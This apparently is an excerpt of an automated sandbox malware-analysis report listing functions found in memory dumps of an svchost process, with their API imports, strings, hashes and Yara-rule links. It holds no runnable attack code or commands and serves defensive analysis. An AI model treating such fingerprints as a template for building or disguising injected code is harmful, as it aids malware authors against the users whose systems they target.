_IsNonwritableInCurrentImage.LIBCMT ref: 0000023AF32E90A8
RtlUnwindEx.NTDLL ref: 0000023AF32E90F7

Strings

csm, xrefs: 0000023AF32E908E
f, xrefs: 0000023AF32E9026

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: 9626061da8fd3a460f6d6bcb32d7400cd34d453b169b234c9771e9f97e557f6b
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: 0A51A236701200C6DB1CCB25D44DB58B79AFB64F88F508136DA964BBC8EB7ECA80C702

Function 0000023AF32E8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000023AF32E9013
_IsNonwritableInCurrentImage.LIBCMT ref: 0000023AF32E90A8
RtlUnwindEx.NTDLL ref: 0000023AF32E90F7

Strings

csm, xrefs: 0000023AF32E908E
f, xrefs: 0000023AF32E9026

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: 63ffd36dcd3943f539e9afe8a9a4ee23790d34f2e488548bf04ad3c00dfbb63a
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: 9B31B135300640C6E718DF21E84D719B7A9FB60B88F458025EE9647BC9DB3ECA80CB06

Function 0000023AF32E1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000023AF32E1A60
StrCmpNIW.SHLWAPI ref: 0000023AF32E1A7A
lstrlenW.KERNEL32 ref: 0000023AF32E1A89
StrCpyW.SHLWAPI ref: 0000023AF32E1A9E

Strings

\\?\, xrefs: 0000023AF32E1A6E

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction ID: 9a0e6a1fe0657e61cc3420f84ac3a8e5e479968615e898656d2d3c1efce8d65c
Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction Fuzzy Hash: 0BF0442230464192EB749F21F88875D6764F768B88F944034DAC946ED4DF3DC78DCB01

Function 0000023AF32E3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000023AF32E3066
StrCpyW.SHLWAPI ref: 0000023AF32E3076
StrCatW.SHLWAPI ref: 0000023AF32E3082
PathCombineW.SHLWAPI ref: 0000023AF32E3090

Strings

\\.\pipe\, xrefs: 0000023AF32E305C

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction ID: 8cbddb09e37f53dfba20b492dcc1bf506de27857d4e4897c64d7ae3e1c0e4dbf
Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction Fuzzy Hash: A0F01264714B8482EB188B63F95C11DA669FB68FD1F085130EEC647F98DF3DC6858B01

Function 0000023AF32EBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000023AF32EBCBD
GetProcAddress.KERNEL32 ref: 0000023AF32EBCD3
FreeLibrary.KERNEL32 ref: 0000023AF32EBCFA

Strings

CorExitProcess, xrefs: 0000023AF32EBCCC
mscoree.dll, xrefs: 0000023AF32EBCB4

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction ID: 4552aeee208f1e4eb317f117dcf18f4d43626f128b76397a397e3b68f671a9f9
Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction Fuzzy Hash: 78F0966131570582EB188B39E45D35D6364FBA4BA1F540239CEEA45AE4DF3EC284CB01

Function 0000023AF32E50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000023AF32E5156

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction ID: bfe489d3787a43adbdb8949a248df29ba402fffb18460cabcb06d35754e30a04
Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction Fuzzy Hash: A502F836219B8086EB64CB59F49535AB7A4F7D5B84F200025EACE87FA8DF7DC584CB01

Function 0000023AF32E5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000023AF32E5726

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction ID: fe422fe2fd9d0706cea3f397b35ccc64bf2cadb06e89a3cd03a3bdbea785b399
Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction Fuzzy Hash: B2610736528B44C6E764CB15E45931AB7A4F798784F200225EACE47FE8DB7EC690CF02

Function 0000023AF32F4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000023AF32F412C
_set_statfp.LIBCMT ref: 0000023AF32F4147
_set_statfp.LIBCMT ref: 0000023AF32F4163
_set_statfp.LIBCMT ref: 0000023AF32F419F

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: e9de8037cbce042c27c932672d77890c086474da7a56bb84ffd5d32a8a1e3d9f
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 3611A322B10A5411FB6C357AE85D76F11406B78BB8F080634A9F607FD6CBEECB454A02

Function 0000023AF32C3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000023AF32C352C
_set_statfp.LIBCMT ref: 0000023AF32C3547
_set_statfp.LIBCMT ref: 0000023AF32C3563
_set_statfp.LIBCMT ref: 0000023AF32C359F

Memory Dump Source

Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: acea8926f7d136cfad38a04c0ef70594d412019f0ee89facdd49f03dfbda46d2
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 0111A722650A1111FB9D1528E4CEB6911806B7D3F4F494E38ABE606FD7CA2ECB414103

Function 0000023AF32BF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000023AF32BF124

Strings

or copy constructor iterator', xrefs: 0000023AF32BF25A, 0000023AF32BF275
Wednesday, xrefs: 0000023AF32BF1ED
Tuesday, xrefs: 0000023AF32BF0F4

Memory Dump Source

Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Tuesday$Wednesday$or copy constructor iterator'
API String ID: 3215553584-4202648911
Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction ID: 9efe82dca6fcfd4791c48a83946f65ccc29f20e32eafcd21540cc00e88081b6b
Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction Fuzzy Hash: DE61C73661064066FB6D8B69E54C32E66A0F775780F548835CAC617FE9DB3ECB418303

Function 0000023AF32EAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000023AF32EAA68
_CallSETranslator.LIBVCRUNTIME ref: 0000023AF32EAAB7

Strings

RCC, xrefs: 0000023AF32EAA85
MOC, xrefs: 0000023AF32EAA7C

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 2e8c72c1664f9f4bebce3a912c6b2e38c4a59c609ae7cbd361f64ae5fe444afe
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: AC615A33600B848AEB18DF65D44539DB7B4FB68B88F045226EF8917B98DB3DC695C701

Function 0000023AF32EAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000023AF32EADA0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000023AF32EAE88

Strings

csm, xrefs: 0000023AF32EADC2
csm, xrefs: 0000023AF32EAEDA

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 2e758ee95c6cf0a9fc398afdb6447f599c145550cfacbb52d9e3712b1ed94f51
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 9C517E721003808AEB788F26958A359B7A8FF65B85F184136DAD947FD5CB3ED6D0C702

Function 0000023AF32BA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000023AF32BA1A0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000023AF32BA288

Strings

csm, xrefs: 0000023AF32BA2DA
csm, xrefs: 0000023AF32BA1C2

Memory Dump Source

Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: e22a72a4e32a4c346d049e31fc576438882dc496dc454bcd5971b3730cb575cf
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: AA516C32104680CAEB788F25955835C77A0F365B94F188226DED987FD6CB3ED6A1CB02

Function 0000023AF32B8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000023AF32B8413
_IsNonwritableInCurrentImage.LIBCMT ref: 0000023AF32B84A8

Strings

csm, xrefs: 0000023AF32B848E
f, xrefs: 0000023AF32B8426

Memory Dump Source

Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: 066f296e7c69333cf7eab93cc9b9949eb87835866d5e2c19bc447ded2b282f1c
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: 2D51BD327016808AEB1DCF15E448B5937A5F364B98F568134DA8A43BC8EB3EDA81C746

Function 0000023AF32B83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000023AF32B8413
_IsNonwritableInCurrentImage.LIBCMT ref: 0000023AF32B84A8

Strings

csm, xrefs: 0000023AF32B848E
f, xrefs: 0000023AF32B8426

Memory Dump Source

Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: fbf4d1ea09ca530c11bc050d45c78e5c1af422512be69d4936dbcf0bfcdabb2a
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: 18316B32201A80D6EB19DF12E848B5977A4F760BD8F558124EEDA07BC8DB3EDA41C746

Function 0000023AF32F2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000023AF32F20D7
WriteFile.KERNEL32 ref: 0000023AF32F239F
WriteFile.KERNEL32 ref: 0000023AF32F23E5
GetLastError.KERNEL32 ref: 0000023AF32F249B

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction ID: e2751f37c9afc06bab20269fd30b95b3ce7bf53436da13fe763090e07bb22a2b
Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction Fuzzy Hash: C3D1ED36B04B8089E715CFB9D44429C3BA5F365B98F108226CE9997FD9DB3DC606CB41

Function 0000023AF32F2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 0000023AF32F2A9C
GetLastError.KERNEL32 ref: 0000023AF32F2B27

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction ID: 6fd4068f5fde012c4dde791a9f378234b0b4c7c006b5b8258291a18aebbb5ec4
Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction Fuzzy Hash: CD91AC7670075085F768DF75D4883AD2BA4F726B88F144129DE8A67EC4DB3EC682CB02

Function 0000023AF32E7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000023AF32E798C
GetCurrentThreadId.KERNEL32 ref: 0000023AF32E799A
GetCurrentProcessId.KERNEL32 ref: 0000023AF32E79A6
QueryPerformanceCounter.KERNEL32 ref: 0000023AF32E79B6

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction ID: 4d56da54cf78304b59e941c3840ad02a4e27cfa3874fb6ac860baba0de6867c0
Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction Fuzzy Hash: 6B113026710F018AEB40DF75E8593A933A4F729B58F440E35DAAD46BA4DF7DC2988381

Function 0000023AF32E253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000023AF32E2620
StrCpyW.SHLWAPI ref: 0000023AF32E2639

Strings

\\.\pipe\, xrefs: 0000023AF32E262B

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction ID: 6f851ab7d2fffd7563023ef623ee8a7de8c3bed235268dd0d459f42558e32ad4
Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction Fuzzy Hash: 3A71A73620078185D72CEF25D8493A9A7A8FBA6B84F540135DE8A53FC9DF3EC7859701

Function 0000023AF32B9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 0000023AF32B9EB7

Strings

MOC, xrefs: 0000023AF32B9E7C
RCC, xrefs: 0000023AF32B9E85

Memory Dump Source

Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 9af03a94526e124235052eff05af4d6ef70a64bd906bbf711c34630943867be5
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 31619A33A00B84CAEB28CF65D04439D77A0F764B88F144626EF8917B98DB3DD295C741

Function 0000023AF32E2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000023AF32E2416
StrCpyW.SHLWAPI ref: 0000023AF32E242D

Strings

\\.\pipe\, xrefs: 0000023AF32E2421

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction ID: f057078fdf437363ca3006686a2bf0829581c85bcab3189ee86c3b948c680c9c
Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction Fuzzy Hash: 8551D13220478181E76CEA29A15D3AAE799FBA5B40F440135DEDA03FC9CB3FC6848742

Function 0000023AF32F26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000023AF32F2807
GetLastError.KERNEL32 ref: 0000023AF32F2829

Strings

U, xrefs: 0000023AF32F27B3

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction ID: 35ef467bd1b652655df33300a8af76435eb501ed725965b0e419b5e742ae772f
Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction Fuzzy Hash: 74419F76714B8082EB208F25E8483AEB7A4F7A9794F544131EE8D87BD4EB3DC641CB51

Function 0000023AF32E94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000023AF32E94F0
RaiseException.KERNEL32 ref: 0000023AF32E9531

Strings

csm, xrefs: 0000023AF32E951E

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction ID: 0e956435bf9f0bef2125082f9e1e6bfa42cb3a6339d934bf258d92915eab66d0
Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction Fuzzy Hash: 06110D36214B8082EB658F25F444359B7E9FB98B94F584225EECD07B99DF3DC691CB00

Function 0000023AF32B7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 0000023AF32B737C

Strings

ierarchy Descriptor', xrefs: 0000023AF32B7381
riptor at (, xrefs: 0000023AF32B7364

Memory Dump Source

Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd

Similarity

API ID: __std_exception_copy
String ID: ierarchy Descriptor'$riptor at (
API String ID: 592178966-758928094
Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction ID: 42c6951a3d5e62022741cb552a0faaa8dc454750388d80c2111df8216ab36858
Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction Fuzzy Hash: 26E08661640B4491DF058F22E84429873A4DB68B64B989132999C06351FA3CD2E9C301

Function 0000023AF32B73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 0000023AF32B73D8

Strings

Locator', xrefs: 0000023AF32B73DD
riptor at (, xrefs: 0000023AF32B73C0

Memory Dump Source

Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd

Similarity

API ID: __std_exception_copy
String ID: Locator'$riptor at (
API String ID: 592178966-4215709766
Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction ID: 220dd3407894242afa797735461295e715a9582d507b77829c604985c3d977a1
Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction Fuzzy Hash: E9E08661600B4480DF058F22D8401987364EB68B64F989132C98C06351EA3CD2E5C301

Function 0000023AF32E1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000023AF32E1C2D
HeapAlloc.KERNEL32 ref: 0000023AF32E1C3B
GetProcessHeap.KERNEL32 ref: 0000023AF32E1C77
HeapFree.KERNEL32 ref: 0000023AF32E1C85

Part of subcall function 0000023AF32E152C: StrCmpIW.SHLWAPI ref: 0000023AF32E155D

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction ID: f1725fcd5410c0a07ce4f1123f09774ab2f82a588070bbaed81ab7e775db846a
Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction Fuzzy Hash: B1118F25701B5481EB08DB66E40A26AB7A5FB99FC0F185034DECD83BA5DE3ED582C701

Function 0000023AF32E1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000023AF32E126E
HeapAlloc.KERNEL32 ref: 0000023AF32E127D
GetProcessHeap.KERNEL32 ref: 0000023AF32E1297
HeapAlloc.KERNEL32 ref: 0000023AF32E12A8

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

